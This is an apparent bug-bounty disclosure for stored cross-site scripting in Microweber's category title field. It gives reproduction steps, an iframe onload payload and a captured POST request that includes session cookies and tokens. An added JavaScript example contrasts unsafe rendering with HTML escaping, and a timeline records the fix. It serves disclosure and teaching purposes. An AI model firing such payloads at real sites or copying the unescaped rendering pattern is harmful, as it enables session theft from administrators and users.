Stored XSS on Categories in microweber/microweber

Valid

Reported on

Aug 7th 2022


Description

The title parameter in the body of the POST request sent when creating or editing a category is vulnerable to stored XSS.

Proof of Concept

1 - Go to https://demo.microweber.org/demo/admin/view:content/action:categories

2 - Create a category or edit an existing one.

3 - Modify the title to an XSS payload: "><iframe onload=prompt(1)>

4 - Save it. Upon visiting the categories or shop page, or when users visit the website, the XSS popup appears.

Screenshots and Video PoC

https://drive.google.com/drive/folders/155GUYDLkFpgezR8LiaI3rl4Ej57aDoKq?usp=sharing

POST Request (headers and body)

POST /demo/api/category/1 HTTP/1.1
Host: demo.microweber.org
Cookie: XSRF-TOKEN=eyJpdiI6IlJ1SDdTaU1pTENXbnFHRStHL3NQMlE9PSIsInZhbHVlIjoiT2Q3bUZDV0dmZzVXSk8xOVVTWW1PcEFURDl2bW9BN0FUNHRKWUFxYnpLUUlWTlZCelRVWGp5anl1Z29GRmNzMnpxcEJCcU1aNzdTMWpGbE8weEFlMDF3UUthTmRHaVlxNDVraUxwTHk4Uk4wK2twbWp5OW9lQ1ZscUVobG01Q1MiLCJtYWMiOiJhYjkwMTc0ZjY5NDcxODVjMTIyNjJjOGIyYTM1MmE3N2Y1YjIyMGZhMzFlYTgwNjgxMjkyZDkzZDg0Y2IyNGVlIiwidGFnIjoiIn0%3D; _ga=GA1.2.1359565319.1659876932; _gid=GA1.2.1567963331.1659876932; laravel_session=42b3afHcNXtB19Y9WXCTYwCrkC5rdAzi7VTQLPQO; remember_web_59ba36addc2b2f9401580f014c7f58ea4e30989d=2%7CTtYWLvivLcGGOKkv5QqtzWhOA7vw6wZPZIbryyJKGsVNHLLfQ4n75QWDNFH8%7C%242y%2410%24114oPbqv.UAg3ca706prIuSTMe3pAc9qYqT2gOBR1uldB9UTk%2FlYu; twk_uuid_599594841b1bed47ceb0520f=%7B%22uuid%22%3A%221.4glA0q3vlKWq3BfdxhMkPX4cwzUwXXo76pb7kSGBL4d01XmOfGrB5YUtfJiyyjGf3YtQ6HwVYvpP2MFZv1Y2QXpWjDE2AlDvkxDrT0tRsmrXgc3eNutuKPNKkVG9btJEhtmKHMjNDxMVUPhAM1k%22%2C%22version%22%3A3%2C%22domain%22%3A%22microweber.org%22%2C%22ts%22%3A1659876933445%7D; back_to_admin=https%3A//demo.microweber.org/demo/admin/category/1/edit
Content-Length: 348
Sec-Ch-Ua: " Not A;Brand";v="99", "Chromium";v="90"
Accept: application/json, text/javascript, */*; q=0.01
X-Xsrf-Token: eyJpdiI6IlJ1SDdTaU1pTENXbnFHRStHL3NQMlE9PSIsInZhbHVlIjoiT2Q3bUZDV0dmZzVXSk8xOVVTWW1PcEFURDl2bW9BN0FUNHRKWUFxYnpLUUlWTlZCelRVWGp5anl1Z29GRmNzMnpxcEJCcU1aNzdTMWpGbE8weEFlMDF3UUthTmRHaVlxNDVraUxwTHk4Uk4wK2twbWp5OW9lQ1ZscUVobG01Q1MiLCJtYWMiOiJhYjkwMTc0ZjY5NDcxODVjMTIyNjJjOGIyYTM1MmE3N2Y1YjIyMGZhMzFlYTgwNjgxMjkyZDkzZDg0Y2IyNGVlIiwidGFnIjoiIn0=
X-Requested-With: XMLHttpRequest
Sec-Ch-Ua-Mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Origin: https://demo.microweber.org
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://demo.microweber.org/demo/admin/category/1/edit
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Connection: close

id=1&rel_type=content&rel_id=8&data_type=category&parent_id=0&_method=PATCH&title=%22%3E%3Ciframe+onload%3Dprompt(document.domain)%3E&category-parent-selector=8&description=&position=0&thumbnail=&url=accessoaries&users_can_create_content=0&category_subtype=default&category_meta_title=&category_meta_description=&category_meta_keywords=&is_hidden=0

Impact

An attacker can steal the cookies of administrators and users who view the injected category.
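
Added here as an illustration of the fix direction, not code from Microweber or from the report: the category title must be encoded for the HTML context it is rendered into, and the admin API can additionally reject titles containing markup. The category record, the renderCategoryLink helpers and the link layout are assumptions for the example.

```javascript
// Added example, not Microweber's code: context-aware encoding of a stored
// category title. A payload of the form "><iframe onload=...> closes a
// double-quoted attribute and injects a new element when the title is
// concatenated into the page verbatim.

// Constructed sample: the URL-decoded `title` value from the report's POST body.
const REPORTED_TITLE = '"><iframe onload=prompt(document.domain)>';

// Encode the five characters that matter in HTML text and in double-quoted
// attribute values, so the same output is inert in both contexts.
function escapeHtml(value) {
  return String(value)
    .replace(/&/g, '&amp;')
    .replace(/</g, '&lt;')
    .replace(/>/g, '&gt;')
    .replace(/"/g, '&quot;')
    .replace(/'/g, '&#39;');
}

// Vulnerable rendering: the stored title lands in an attribute and in element
// text without encoding. This is the pattern the report's payload targets.
function renderCategoryLinkUnsafe(category) {
  return `<a href="/category/${category.url}" title="${category.title}">` +
         `${category.title}</a>`;
}

// Hardened rendering: each untrusted value is encoded for the context it
// lands in (URL slug: percent-encoded, then HTML-encoded; title: HTML-encoded).
function renderCategoryLink(category) {
  const url = escapeHtml(encodeURIComponent(category.url));
  const title = escapeHtml(category.title);
  return `<a href="/category/${url}" title="${title}">${title}</a>`;
}

// Defence in depth at save time: a category title has no business containing
// angle brackets, so the admin API can reject such input before storing it.
function titleLooksLikeMarkup(title) {
  return /[<>]/.test(String(title));
}

// Constructed category record mirroring the report's request body.
const sample = { url: 'accessoaries', title: REPORTED_TITLE };
console.log(renderCategoryLinkUnsafe(sample)); // contains a live <iframe>
console.log(renderCategoryLink(sample));       // the payload is inert text
```

Output encoding at render time is the actual fix; the save-time check only narrows the input and must not be relied on alone.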

Timeline

2 months ago: We are processing your report and will contact the microweber team within 24 hours.
A month ago: We have contacted a member of the microweber team and are waiting to hear back.
A month ago: Peter Ivanov validated this vulnerability.
Amine has been awarded the disclosure bounty.
The fix bounty is now up for grabs.
The researcher's credibility has increased: +7
A month ago: Peter Ivanov confirmed that a fix has been merged on 60eef7.
Peter Ivanov has been awarded the fix bounty.